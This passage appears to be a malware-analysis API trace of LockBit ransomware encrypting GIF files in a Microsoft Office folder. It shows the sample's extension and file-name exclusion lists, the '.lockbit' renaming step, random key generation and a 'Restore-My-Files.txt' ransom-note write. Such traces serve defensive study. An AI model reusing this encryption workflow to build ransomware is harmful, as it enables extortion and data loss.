returned -1 [0203.485] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.485] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.486] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.486] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14866_.GIF") returned 1 [0203.487] lstrcmpiW (lpString1="ntldr", lpString2="BD14866_.GIF") returned 1 [0203.487] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14866_.GIF") returned 1 [0203.487] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14866_.GIF") returned 1 [0203.487] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14866_.GIF") returned -1 [0203.487] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14866_.GIF") returned 1 [0203.487] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14866_.GIF") returned 1 [0203.487] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.487] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF") returned=".GIF" [0203.487] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.487] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.487] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.488] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF.lockbit") returned 78 [0203.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14866_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.490] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.490] malloc (_Size=0x40068) returned 0x3df0008 [0203.490] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=501) returned 1 [0203.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.491] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.494] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.494] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.494] free (_Block=0x1fa2ed8) [0203.494] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.494] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.494] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.494] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c80200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x18c80200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14867_.GIF", cAlternateFileName="")) returned 1 [0203.494] lstrcmpiW (lpString1=".", lpString2="BD14867_.GIF") returned -1 [0203.494] lstrcmpiW (lpString1="..", lpString2="BD14867_.GIF") returned -1 [0203.494] PathFindExtensionW (pszPath="BD14867_.GIF") returned=".GIF" [0203.494] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.494] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.494] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.495] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.495] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14867_.GIF") returned 1 [0203.495] lstrcmpiW (lpString1="ntldr", lpString2="BD14867_.GIF") returned 1 [0203.495] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14867_.GIF") returned 1 [0203.495] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14867_.GIF") returned 1 [0203.496] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14867_.GIF") returned -1 [0203.496] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14867_.GIF") returned 1 [0203.496] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14867_.GIF") returned 1 [0203.496] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.496] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF") returned=".GIF" [0203.496] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.496] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.496] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.496] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF.lockbit") returned 78 [0203.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14867_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.498] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.498] malloc (_Size=0x40068) returned 0x3df0008 [0203.498] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=253) returned 1 [0203.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.499] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.502] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.502] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.502] free (_Block=0x1fa2ed8) [0203.502] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.502] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.502] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c80200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x18c80200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14868_.GIF", cAlternateFileName="")) returned 1 [0203.502] lstrcmpiW (lpString1=".", lpString2="BD14868_.GIF") returned -1 [0203.502] lstrcmpiW (lpString1="..", lpString2="BD14868_.GIF") returned -1 [0203.502] PathFindExtensionW (pszPath="BD14868_.GIF") returned=".GIF" [0203.502] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.502] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.502] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.503] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.503] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14868_.GIF") returned 1 [0203.503] lstrcmpiW (lpString1="ntldr", lpString2="BD14868_.GIF") returned 1 [0203.503] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14868_.GIF") returned 1 [0203.503] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14868_.GIF") returned 1 [0203.503] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14868_.GIF") returned -1 [0203.503] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14868_.GIF") returned 1 [0203.504] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14868_.GIF") returned 1 [0203.504] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.504] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF") returned=".GIF" [0203.504] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.504] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.504] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.504] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF.lockbit") returned 78 [0203.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF" (normalized: "c:\\program files\\microsoft 